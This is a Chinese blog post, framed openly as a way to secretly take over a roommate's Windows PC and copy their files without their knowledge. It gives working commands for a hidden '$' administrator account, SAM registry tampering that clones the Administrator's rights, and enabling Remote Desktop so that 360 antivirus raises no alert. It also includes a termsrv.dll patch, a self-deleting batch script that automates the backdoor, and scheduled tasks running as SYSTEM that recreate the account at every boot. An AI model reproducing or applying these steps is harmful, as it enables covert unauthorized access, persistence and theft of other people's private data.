<!DOCTYPE html>
<html lang="zh-CN">








<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
    <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
    <link rel="icon" type="image/png" href="/img/favicon.png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="description" content>
    <meta name="author" content="Crazy-wen">
    <meta name="keywords" content>
    <title>在室友的windows创建隐藏用户 ~ Crazy-wen&#39;s Blog</title>
    <link rel="stylesheet" href="/lib/font-awesome/css/all.min.css?v=5.7.2">
    <link rel="stylesheet" href="/lib/mdbootstrap/css/bootstrap.min.css?v=4.3.1">
    <link rel="stylesheet" href="/lib/mdbootstrap/css/mdb.min.css?v=4.8.7">
    <link rel="stylesheet" href="/lib/github-markdown/github-markdown.min.css">
    <link rel="stylesheet" href="/lib/nprogress/nprogress.css?v=0.2.0">
    <link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">
    
        <link rel="stylesheet" href="/lib/prettify/atelier-seaside-light.min.css">
    
    <link rel="stylesheet" href="/css/main.css">
    
    
<script type="text/javascript">

 <script>
var _hmt = _hmt || [];
_hmt.push(['_setPageTag', id, value]);
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?d2c7132109d78f54ab072ec83dfe40e1";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>




</head>


<body>
<header style="height: 100vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
<div class="container">
    <a class="navbar-brand" href="/">&nbsp;<strong>Crazy-wen&#39;s Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent"
        aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
        <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
        <ul class="navbar-nav ml-auto text-center">
            
            <li class="nav-item">
                <a class="nav-link" href="/">Home</a>
            </li>
            
            <li class="nav-item">
                <a class="nav-link" href="/archives/">Archives</a>
            </li>
            
            <li class="nav-item">
                <a class="nav-link" href="/categories/">Categories</a>
            </li>
            
            <li class="nav-item">
                <a class="nav-link" href="/tags/">Tags</a>
            </li>
            
        </ul>
    </div>
</div>


</nav>
    <div class="view intro-2"
         style="background: url('/img/post.jpg')no-repeat center center;background-size: cover;">
        <div class="full-bg-img">
            <div class="mask rgba-black-light flex-center">
                <div class="container text-center white-text wow fadeInUp">
                    <span  class="h1"  id="subtitle">
                        
                    </span>
                    
                        <br>
                        <p>Friday, August 30th 2019, 1:12 pm</p>
                    
                </div>
            </div>
        </div>
    </div>
</header>

<main>
    
        




<div class="container-fluid">
    <div class="row">
        <div class="d-none d-lg-block col-lg-2"></div>
            <div class="col-lg-8 nopadding-md">
                <div class="py-5 z-depth-3 board">
                    <div class="post-content mx-auto">
                        <div class="markdown-body">
                            <p>原文链接：<a href="https://crazy-wen.github.io/2019/08/30/%E9%9A%90%E8%97%8F%E5%BC%80%E6%9C%BA%E7%99%BB%E5%BD%95%E7%94%A8%E6%88%B7/" target="_blank" rel="noopener">https://crazy-wen.github.io/2019/08/30/%E9%9A%90%E8%97%8F%E5%BC%80%E6%9C%BA%E7%99%BB%E5%BD%95%E7%94%A8%E6%88%B7/</a></p>
<h1 id="背景"><a href="#背景" class="headerlink" title="背景"></a>背景</h1><blockquote>
<p>有一天，我突然想获取你室友电脑上的重要资料，又不想让你室友知道，并在以后也能轻松获取，那怎么办呢？找机会查看他的账户密码？这貌似不太可能，因为windows的密码是经过散列加密的，这种加密技术在技术上来说是不可逆的。在windows 9X时代，由于技术的不完善，用户可以通过某些方式跳过密码登录，抑或删除密码。但是后续的windows均进行了更新，致使无法破解抑或查看密码。</p>
</blockquote>
<blockquote>
<p>虽然还有诸多办法，但是我认为的还是<strong>取得他的电脑权限</strong>，因此我们可以找机会在他的电脑上进行操作，取得权限并维权，开启FTP服务，获取其电脑上的资料。<br>接下来，我要用三种方法实现对室友主机的渗透并维权</p>
</blockquote>
<h1 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h1><pre><code>Windows 7(被控主机)
Windows 10</code></pre><h1 id="方法一：创建用户并且在开机时不显示"><a href="#方法一：创建用户并且在开机时不显示" class="headerlink" title="方法一：创建用户并且在开机时不显示"></a>方法一：创建用户并且在开机时不显示</h1><h2 id="win7："><a href="#win7：" class="headerlink" title="win7："></a>win7：</h2><h3 id="创建隐藏的超级用户"><a href="#创建隐藏的超级用户" class="headerlink" title="创建隐藏的超级用户"></a>创建隐藏的超级用户</h3><p>以管理员身份运行命令行</p>
<pre><code>net user wen$ wen /add   
net localgroup administrators wen$ /add</code></pre><blockquote>
<p>创建用户名为wen，密码为wen的新用户，$使得新用户使用net user不会显示出来,并将用户提升为管理员权限。此时，我们在控制面板-&gt;用户账户中仍然可以看见创建的新用户,接下来就是让这个用户在控制面板以及系统登入的页面里消失。</p>
</blockquote>
<blockquote>
<p>每次执行net命令的时候，系统去注册表的HKLM\SAM\SAM\Domains\Account\Users\Names下面取项值,然后打印在屏幕上，就是你看到的结果,所以，即使你随便在这个项值下面添加一项，也会通过net命令显示出来的。其中的一个小技巧就是如果用户名后面带一个$符号的时候，就不会显示出来，所以，在net命令下隐身很容易的，只要你添加的用户名是以$结尾的就可以了</p>
</blockquote>
<h3 id="偷梁换柱，将隐藏账户替换为管理员"><a href="#偷梁换柱，将隐藏账户替换为管理员" class="headerlink" title="偷梁换柱，将隐藏账户替换为管理员"></a>偷梁换柱，将隐藏账户替换为管理员</h3><blockquote>
<p>在注册表中对系统账户的键值进行操作，运行中输入regedit，来到HKEY_LOCAL_MACHINE\SAM\SAM后，会发现无法展开该处所在的键值。这是因为系统默认对系统管理员给予“写入”和“读取控制”权限，没有给予<strong>修改权限</strong>，因此我们没有办法对“SAM”项下的键值进行查看和修改。不过我们可以给予他权限。（单机右建，看到权限，把名叫administrator的用户给予：完全控制以及读取的权限，在后面打勾就行）</p>
</blockquote>
<blockquote>
<p>成功得到注册表操作权限后，我们就可以正式开始隐藏账户的制作了。来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处，当前系统中所有存在的账户都会在这里显示，当然包括我们的隐藏账户。点击我们的隐藏账户，在右边显示的键值中的“类型”一项显示为0x3ec，向上来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\”处，可以找到“000003EC”这一项，这两者是相互对应的，隐藏用户的所有信息都在“000003EC这一项中。同样的，我们可以找到“administrator”账户所对应的项为“000001F4”。将“wen$”的键值导出为wen$.reg，然后我们将“000001F4”的F值复制到“000003F1”的F值中（就是<strong>替换</strong>）。完成后保存。接下来进入“命令提示符”，输入“net user wen$ /del”将我们建立的隐藏账户删除。最后，将wen$.reg导入注册表，至此，隐藏账户制作完成。</p>
</blockquote>
<p><strong>重启！！</strong><br><strong>发现用户名已经不在登录界面显示</strong></p>
<h3 id="近在咫尺，开启远程桌面连接服务"><a href="#近在咫尺，开启远程桌面连接服务" class="headerlink" title="近在咫尺，开启远程桌面连接服务"></a>近在咫尺，开启远程桌面连接服务</h3><p>在命令行中输入</p>
<pre><code>reg delete &quot;HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services&quot; /F
reg add &quot;HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services&quot; /v fDenyTSConnections /t REG_DWORD /d 0</code></pre><blockquote>
<p>开启远程桌面服务，发现 “我的电脑”属性-&gt;选中远程-&gt;将”远程桌面”下的”允许用户连接到此计算机” 变成灰色的了，不能修改了。虽然这样方便，但是也很留下痕迹。</p>
</blockquote>
<p><a href="https://imgchr.com/i/nQ1IC4" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/09/07/nQ1IC4.md.png" alt="nQ1IC4.md.png"></a></p>
<blockquote>
<p>网上的方法是修改组策略中的终端服务，但是在win7中，我没有找到这一项，因此，这一项先放一放，日后在研究，</p>
</blockquote>
<blockquote>
<p>如果通过桌面方式开启远程桌面连接，在360安全卫士进行体检后会被提示开启了远程桌面接连,但是通过命令行来开启的话，360是不会给与提示的。</p>
</blockquote>
<h3 id="尝试第一次连接"><a href="#尝试第一次连接" class="headerlink" title="尝试第一次连接"></a>尝试第一次连接</h3><p><a href="https://imgchr.com/i/nQ1T29" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/09/07/nQ1T29.md.png" alt="nQ1T29.md.png"></a></p>
<blockquote>
<p>在尝试第一次，发现win10主机连接时，所登陆的用户是administrator的，但同时，win7上的用户也被注销，出现用户登录界面，<strong>这显然很容易被发现</strong>，后来又换了普通用户尝试了几次，结果是一样的，得出结论，<strong>这台计算机只允许一个用户登陆</strong>，因此，下一步是让<strong>多个用户同时登陆</strong></p>
</blockquote>
<blockquote>
<p>运行-&gt;gpedit，打开组策略编辑器，依次展开计算机配置—&gt;管理模板—&gt;Windows组件—&gt;远程桌面服务—&gt;远程桌面会话主机—&gt;连接—&gt;<strong>限制连接的数量，打开限制连接数</strong>，这里未配置时，默认的最大连接数是1.<strong>点击已启用—&gt;允许的RD最大连接数为该为2—&gt;确定</strong>，打开“<strong>远程桌面服务用户限制到单独的远程桌面服务会话</strong>”，<strong>点击已禁用，</strong></p>
</blockquote>
<p><a href="https://imgchr.com/i/nQ1hUU" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/09/07/nQ1hUU.md.png" alt="nQ1hUU.md.png"></a><br><a href="https://imgchr.com/i/nQ1fET" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/09/07/nQ1fET.md.png" alt="nQ1fET.md.png"></a></p>
<blockquote>
<p>下载一个universal termsrv.dll patch。（<strong>破解远程桌面多用户同时连接数限制</strong>）</p>
</blockquote>
<p><a href="https://imgchr.com/i/nQ1RbV" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/09/07/nQ1RbV.md.png" alt="nQ1RbV.md.png"></a></p>
<p><strong><em>此时再进行远程桌面连接，发现可以多用户登陆！！！</em></strong></p>
<h3 id="BUG"><a href="#BUG" class="headerlink" title="BUG"></a>BUG</h3><blockquote>
<p>在后续尝试中，发现一个小BUG，远程连接过一次后，在被控主机切换用户时，会显示wen$已登陆，这样显然会被发现本机已经被渗透了。</p>
</blockquote>
<h3 id="解决"><a href="#解决" class="headerlink" title="解决"></a>解决</h3><blockquote>
<p>在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList <strong>（若注册表中没有则自行创建）</strong>下新建DWORD值，名称为wen$,值为0隐藏，值为1显示。再次切换用户，登录界面已经没有隐藏用户。</p>
</blockquote>
<h3 id="制作成批处理文件"><a href="#制作成批处理文件" class="headerlink" title="制作成批处理文件"></a>制作成批处理文件</h3><p><strong>为了更方便入侵渗透，我按照上述原理制作成.bat文件。</strong></p>
<pre><code>net user admins$ 1234567 /add
net localgroup administrators admins$ /add
Echo HKEY_LOCAL_MACHINE\SAM [1] &gt;&gt;c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM [1] &gt;&gt;c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1] &gt;&gt;c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1] &gt;&gt;c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1] &gt;&gt;c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1] &gt;&gt;c:/tem.ini
regini c:/tem.ini
regedit /e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
net user admins$ /del
regedit /s c:\1.reg
reg delete &quot;HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services&quot; /F
reg add &quot;HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services&quot; /v fDenyTSConnections /t REG_DWORD /d 0
reg add &quot;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts&quot;
reg add &quot;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&quot;
reg add &quot;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList&quot; /v admins$ /t REG_DWORD /d 0
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [0] &gt;c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [0] &gt;&gt;c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [0] &gt;&gt;c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [0] &gt;&gt;c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM [0] &gt;&gt;c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\ [0] &gt;&gt;c:/tem.ini
regini c:/tem.ini
del c:\tem.ini
del c:\1.reg
del %0</code></pre><blockquote>
<p>前两行为创建admins$的用户，密码为1234567，并提权<br>Echo<em>类型的命令为将信息写入c:/tem.ini<br>regini</em>类型为修改注册表权限，[1]为完全访问<br>regedit /e导出<br>regedit /s导入<br>del %0:删除自身</p>
</blockquote>
<h3 id="验证"><a href="#验证" class="headerlink" title="验证"></a>验证</h3><p><strong>还是无法使用admins$登陆，原因是权限不够，有两种解决办法</strong></p>
<ul>
<li><p>远程连接设置中添加隐藏用户</p>
<blockquote>
<p>在.bat文件中加入命令<br>net localgroup Remote Desktop Users admins$ /add</p>
</blockquote>
</li>
<li><p>替换注册表中的隐藏用户的F值</p>
</li>
</ul>
<p>&emsp;&emsp;虽然可以成功登陆，但是只能登陆一个用户，所以极易被发现，因此还需修改连接数<br>&emsp;&emsp;按照上述原理，修改组策略再运行破解软件就可以达到效果，实际上修改组策略就是修改注册表（不完全是），但是我在网上找了很久，还是不知道<strong>组策略中远程桌面连接服务对应注册表</strong>中的资料，所以暂时先放一放。</p>
<h3 id="在win20中运行-bat"><a href="#在win20中运行-bat" class="headerlink" title="在win20中运行.bat"></a>在win20中运行.bat</h3><blockquote>
<p>实验发现，在win10中运行.bat爷爷已达到同样的效果，</p>
</blockquote>
<p><a href="https://imgchr.com/i/n8UZkj" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/09/08/n8UZkj.md.png" alt="n8UZkj.md.png"></a></p>
<blockquote>
<p>但是在win10中破解多个用户登陆与win7有差别，主要有两种方法：</p>
</blockquote>
<ul>
<li><p>远程桌面多用户登陆补丁,将termsrv.dll文件替换c:\windows\system32\下的同名文件即可<br><a href="https://imgchr.com/i/nGSFYV" target="_blank" rel="noopener"><img src="https://s2.ax1x.com/2019/09/08/nGSFYV.md.png" alt="nGSFYV.md.png"></a></p>
</li>
<li><p>使用win10的远程桌面多用户登陆破解软件</p>
</li>
</ul>
<h1 id="方法二：以开关机为触发时间的计划任务创建删除用户"><a href="#方法二：以开关机为触发时间的计划任务创建删除用户" class="headerlink" title="方法二：以开关机为触发时间的计划任务创建删除用户"></a>方法二：以开关机为触发时间的计划任务创建删除用户</h1><blockquote>
<p>计划任务面板可以在cmd中输入taskschd打开，在命令中可以使用schtasks命令创建计划任务</p>
</blockquote>
<blockquote>
<p>描述:<br>允许管理员在本地或远程系统上创建计划任务。</p>
</blockquote>
<h4 id="用法"><a href="#用法" class="headerlink" title="用法"></a>用法</h4><pre><code>/U   username      指定应在其中执行 SchTasks.exe 的用户上下文。

/P   [password]    指定给定用户上下文的密码。如果省略则提示输入。

/RU  username      指定任务在其下运行的“运行方式”用户帐户(用户上下文)。
                   对于系统帐户，有效值是 &quot;&quot;、&quot;NT AUTHORITY\SYSTEM&quot; 或&quot;SYSTEM&quot;。
                   对于 v2 任务，&quot;NT AUTHORITY\LOCALSERVICE&quot;和
                   &quot;NT AUTHORITY\NETWORKSERVICE&quot;以及常见的 SID。对这三个也都可用。

/RP  [password]    指定“运行方式”用户的密码。要提示输入密码，值必须是 &quot;*&quot; 或无。
                   系统帐户会忽略该密码。必须和 /RU 或 /XML 开关一起使用。

/RU/XML  /SC  schedule     指定计划频率。
                   有效计划任务:  MINUTE、 HOURLY、DAILY、WEEKLY、
                   MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE, ONEVENT.

/MO   modifier     改进计划类型以允许更好地控制计划重复
                   周期。有效值列于下面“修改者”部分中。

/D    days         指定该周内运行任务的日期。有效值:
                   MON、TUE、WED、THU、FRI、SAT、SUN
                   和对 MONTHLY 计划的 1 - 31
                   (某月中的日期)。通配符“*”指定所有日期。

/M    months       指定一年内的某月。默认是该月的第一天。
                   有效值: JAN、FEB、MAR、APR、MAY、JUN、
                   JUL、 AUG、SEP、OCT、NOV  和 DEC。通配符
                   “*” 指定所有的月。

/I    idletime     指定运行一个已计划的 ONIDLE 任务之前
                   要等待的空闲时间。
                   有效值范围: 1 到 999 分钟。

/TN   taskname     指定唯一识别这个计划任务的名称。

/TR   taskrun      指定在这个计划时间运行的程序的路径
                   和文件名。
                   例如: C:\windows\system32\calc.exe

/ST   starttime    指定运行任务的开始时间。
                   时间格式为 HH:mm (24 小时时间)，例如 14:30 表示
                   2:30 PM。如果未指定 /ST，则默认值为
                   当前时间。/SC ONCE 必需有此选项。

/RI   interval     用分钟指定重复间隔。这不适用于
                   计划类型: MINUTE、HOURLY、
                   ONSTART, ONLOGON, ONIDLE, ONEVENT.
                   有效范围: 1 - 599940 分钟。
                   如果已指定 /ET 或 /DU，则其默认值为
                   10 分钟。

/ET   endtime      指定运行任务的结束时间。
                   时间格式为 HH:mm (24 小时时间)，例如，14:50 表示 2:50 PM。
                   这不适用于计划类型: ONSTART、
                   ONLOGON, ONIDLE, ONEVENT.

/DU   duration     指定运行任务的持续时间。
                   时间格式为 HH:mm。这不适用于 /ET 和
                   计划类型: ONSTART, ONLOGON, ONIDLE, ONEVENT.
                   对于 /V1 任务，如果已指定 /RI，则持续时间默认值为
                   1 小时。

/K                 在结束时间或持续时间终止任务。
                   这不适用于计划类型: ONSTART、
                   ONLOGON, ONIDLE, ONEVENT.
                   必须指定 /ET 或 /DU。

/SD   startdate    指定运行任务的第一个日期。
                   格式为 yyyy/mm/dd。默认值为
                   当前日期。这不适用于计划类型: ONCE、
                   ONSTART, ONLOGON, ONIDLE, ONEVENT.

/ED   enddate      指定此任务运行的最后一天的日期。
                   格式是 yyyy/mm/dd。这不适用于计划类型:
                    ONCE、ONSTART、ONLOGON、ONIDLE。

/EC   ChannelName  为 OnEvent 触发器指定事件通道。

/IT                仅有在 /RU 用户当前已登录且
                   作业正在运行时才可以交互式运行任务。
                   此任务只有在用户已登录的情况下才运行。

/NP                不储存任何密码。任务以给定用户的身份
                   非交互的方式运行。只有本地资源可用。

/Z                 标记在最终运行完任务后删除任务。

/XML  xmlfile      从文件的指定任务 XML 中创建任务。
                   可以组合使用 /RU 和 /RP 开关，或者在任务 XML 已包含
                   主体时单独使用 /RP。

/V1                创建 Vista 以前的平台可以看见的任务。
                   不兼容 /XML。

/F                 如果指定的任务已经存在，则强制创建
                   任务并抑制警告。

/RL   level        为作业设置运行级别。有效值为
                   LIMITED 和 HIGHEST。默认值为 LIMITED。

/DELAY delaytime   指定触发触发器后延迟任务运行的
                   等待时间。时间格式为
                   mmmm:ss。此选项仅对计划类型
                   ONSTART, ONLOGON, ONEVENT.

/?                 显示帮助消息。</code></pre><h4 id="设置开机创建用户"><a href="#设置开机创建用户" class="headerlink" title="设置开机创建用户"></a>设置开机创建用户</h4><blockquote>
<p>schtasks /create /tn “Microsoft\Windows\LocalEventLog” /tr “&quot;cmd.exe&quot; /k net user test$ 123456 /add /y /active:yes &gt;&gt; nul &amp; net localgroup administrators test$ /add &gt; nul &amp; net user test$ /comment:&quot;Built-in account for Backdooring your network suckers&quot; &gt; nul &amp; exit” /f /ru system /sc onstart</p>
</blockquote>
<h4 id="设置关机删除用户"><a href="#设置关机删除用户" class="headerlink" title="设置关机删除用户"></a>设置关机删除用户</h4><blockquote>
<p>schtasks /create /tn “Microsoft\Windows\LocalEventLog” /tr “&quot;cmd.exe&quot; /k net user test$ /del &gt; nul &amp; exit” /f /ru system /sc onevent /ec System /mo “*[System[EventID=1074]]”</p>
</blockquote>

                            <hr>
                        </div>
                        <br>
                        <div>
                            
                            <p>
                                <i class="iconfont icon-tag"></i>
                                
                                    <a class="hover-with-bg" href="/tags/windows">windows</a>
                                
                            </p>
                            
                                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
                            
                        </div>
                    </div>
                </div>
            </div>
        <div class="d-none d-lg-block col-lg-2 toc-container">
            
  <div id="toc">
    <p class="h4"><i class="far fa-list-alt"></i> Toc:</p> 
    <div id="tocbot"></div>
  </div>

        </div>
    </div>
</div>

<!-- custom -->


<!-- Comments -->
<div class="col-lg-7 mx-auto nopadding-md">
    <div class="container comments mx-auto" id="comments">
        
            <br><br>
            
            <div class="disqus" style="width:100%">
    <div id="disqus_thread"></div>
    <script>               
        var disqus_shortname = '';
        var disqus_config = function () {
            this.page.url = 'http://127.0.0.1:4000/2019/08/30/隐藏开机登录用户/'; 
            this.page.identifier = '/2019/08/30/隐藏开机登录用户/';
        };
        (function() { 
            var d = document, s = d.createElement('script');
            s.type = 'text/javascript';
            s.src = '//'+disqus_shortname+'.disqus.com/embed.js';
            s.setAttribute('data-timestamp', +new Date());
            (d.head || d.body).appendChild(s);
        })();
    </script>
    <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow noopener">comments powered by Disqus.</a></noscript>
</div>
        
    </div>
</div>
    
</main>

<footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/0x2e/Material-T" target="_blank" rel="nofollow noopener"> <b>Material-T</b></a>
    <br>
    
  </div>
</footer>

  <!-- SCRIPTS -->
  <script src="/lib/mdbootstrap/js/jquery-3.4.1.min.js"></script>
  <script src="/lib/mdbootstrap/js/popper.min.js"></script>
  <script src="/lib/mdbootstrap/js/bootstrap.min.js?v=4.3.1"></script>
  <script src="/lib/mdbootstrap/js/mdb.min.js?v=4.8.7"></script>
  <script src="/lib/nprogress/nprogress.min.js?v=0.2.0"></script>
  <script src="/js/main.js"></script>
  
    
      <script src="/lib/tocbot/tocbot.min.js?v=4.7.0"></script>
    
    <script src="/js/post.js"></script>
  
  
    <script src="/lib/prettify/prettify.min.js?v=0.1.0"></script>
    <script>
      $(document).ready(function(){
        $('pre').addClass('prettyprint linenums');
        prettyPrint();
      })
    </script>
  
  
    <script src="/lib/typed/typed.min.js?v=2.0.9"></script>
    <script>
        var typed = new Typed('#subtitle', {
          strings: [
            '  ',
            "在室友的windows创建隐藏用户&nbsp;",
        ],
        cursorChar: "_",
        typeSpeed: 70,
        startDelay: 300, //开始之前延迟300毫秒
        loop: false,
        });
        $(".typed-cursor").addClass("h2");
    </script>
  
  
    <script src="/lib/anchor/anchor.min.js?v=4.2.0"></script>
    <script>
      anchors.options = {
        placement: "right",
        visible: "true",
        
      };
      anchors.add(".post-content > h1,h2,h3,h4,h5,h6");
    </script>
  

  
</body>
</html>
